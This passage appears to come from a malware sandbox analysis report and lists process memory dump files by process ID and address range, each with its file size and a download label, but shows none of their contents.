                      Filesize

                      4.7MB

                      Download

                    • memory/2020-51-0x0000000000360000-0x000000000080F000-memory.dmp

                      Filesize

                      4.7MB

                      Download

                    • memory/2020-158-0x0000000000360000-0x000000000080F000-memory.dmp

                      Filesize

                      4.7MB

                      Download

                    • memory/2020-256-0x0000000006A30000-0x0000000007665000-memory.dmp

                      Filesize

                      12.2MB

                      Download

                    • memory/2020-201-0x0000000006A30000-0x000000000743A000-memory.dmp

                      Filesize

                      10.0MB

                      Download

                    • memory/2020-622-0x0000000000360000-0x000000000080F000-memory.dmp

                      Filesize

                      4.7MB

                      Download

                    • memory/2244-205-0x0000000000400000-0x000000000042F000-memory.dmp

                      Filesize

                      188KB

                      Download

                    • memory/2244-203-0x0000000000400000-0x000000000042F000-memory.dmp

                      Filesize

                      188KB

                      Download

                    • memory/2244-211-0x0000000010000000-0x000000001001C000-memory.dmp

                      Filesize

                      112KB

                      Download

                    • memory/2328-172-0x0000000001070000-0x00000000010E8000-memory.dmp

                      Filesize

                      480KB

                      Download

                    • memory/2332-12-0x00000000064E0000-0x000000000698F000-memory.dmp

                      Filesize

                      4.7MB

                      Download

                    • memory/2332-13-0x00000000064E0000-0x000000000698F000-memory.dmp

                      Filesize

                      4.7MB

                      Download

                    • memory/2524-80-0x00000000065E0000-0x0000000006A8F000-memory.dmp

                      Filesize

                      4.7MB

                      Download

                    • memory/2524-81-0x00000000065E0000-0x0000000006A8F000-memory.dmp

                      Filesize

                      4.7MB

                      Download

                    • memory/2548-288-0x0000000000400000-0x000000000042F000-memory.dmp

                      Filesize

                      188KB

                      Download

                    • memory/2624-382-0x00000000011C0000-0x00000000014D1000-memory.dmp

                      Filesize

                      3.1MB

                      Download

                    • memory/2684-154-0x0000000006640000-0x0000000006AEF000-memory.dmp

                      Filesize

                      4.7MB

                      Download

                    • memory/2728-29-0x0000000000FC0000-0x000000000146F000-memory.dmp

                      Filesize

                      4.7MB

                      Download

                    • memory/2728-30-0x0000000006FB0000-0x000000000745F000-memory.dmp

                      Filesize

                      4.7MB

                      Download

                    • memory/2728-15-0x0000000000FC0000-0x000000000146F000-memory.dmp

                      Filesize

                      4.7MB

                      Download

                    • memory/2736-202-0x0000000001240000-0x0000000001C4A000-memory.dmp

                      Filesize

                      10.0MB

                      Download

                    • memory/2736-144-0x0000000001240000-0x0000000001C4A000-memory.dmp

                      Filesize

                      10.0MB

                      Download

                    • memory/2736-206-0x0000000001240000-0x0000000001C4A000-memory.dmp

                      Filesize

                      10.0MB

                      Download

                    • memory/2736-200-0x0000000001240000-0x0000000001C4A000-memory.dmp

                      Filesize

                      10.0MB

                      Download

                    • memory/2956-285-0x0000000000ED0000-0x0000000001B05000-memory.dmp

                      Filesize

                      12.2MB

                      Download

                    • memory/2956-252-0x0000000000ED0000-0x0000000001B05000-memory.dmp

                      Filesize

                      12.2MB

                      Download

                    • memory/2956-287-0x0000000076A90000-0x0000000076B8A000-memory.dmp

                      Filesize

                      1000KB

                      Download

                    • memory/2956-286-0x0000000076B90000-0x0000000076CAF000-memory.dmp

                      Filesize

                      1.1MB

                      Download

                    • memory/3176-903-0x000000001B620000-0x000000001B902000-memory.dmp

                      Filesize

                      2.9MB

                      Download

                    • memory/3176-904-0x0000000001E80000-0x0000000001E88000-memory.dmp

                      Filesize

                      32KB

                      Download

                    • memory/3324-628-0x00000000000D0000-0x000000000056B000-memory.dmp

                      Filesize

                      4.6MB

                      Download

                    • memory/3620-639-0x0000000001370000-0x00000000013E0000-memory.dmp

                      Filesize

                      448KB

                      Download

                    • memory/3656-643-0x0000000000400000-0x0000000000466000-memory.dmp

                      Filesize

                      408KB

                      Download

                    • memory/3656-649-0x0000000000400000-0x0000000000466000-memory.dmp

                      Filesize

                      408KB

                      Download

                    • memory/3656-641-0x0000000000400000-0x0000000000466000-memory.dmp

                      Filesize

                      408KB

                      Download

                    • memory/3656-653-0x0000000000400000-0x0000000000466000-memory.dmp

                      Filesize

                      408KB

                      Download

                    • memory/3656-652-0x0000000000400000-0x0000000000466000-memory.dmp

                      Filesize

                      408KB

                      Download

                    • memory/3656-651-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3656-645-0x0000000000400000-0x0000000000466000-memory.dmp

                      Filesize

                      408KB

                      Download

                    • memory/3656-647-0x0000000000400000-0x0000000000466000-memory.dmp

                      Filesize

                      408KB

                      Download

                    • memory/3848-663-0x0000000000270000-0x0000000000282000-memory.dmp

                      Filesize

                      72KB

                      Download

                    • memory/3848-664-0x0000000000240000-0x0000000000250000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/3944-679-0x0000000000300000-0x0000000000360000-memory.dmp

                      Filesize

                      384KB

                      Download

                    • memory/4004-681-0x0000000000400000-0x0000000000429000-memory.dmp

                      Filesize

                      164KB

                      Download

                    • memory/4004-683-0x0000000000400000-0x0000000000429000-memory.dmp

                      Filesize

                      164KB

                      Download

                    • memory/4004-685-0x0000000000400000-0x0000000000429000-memory.dmp

                      Filesize

                      164KB

                      Download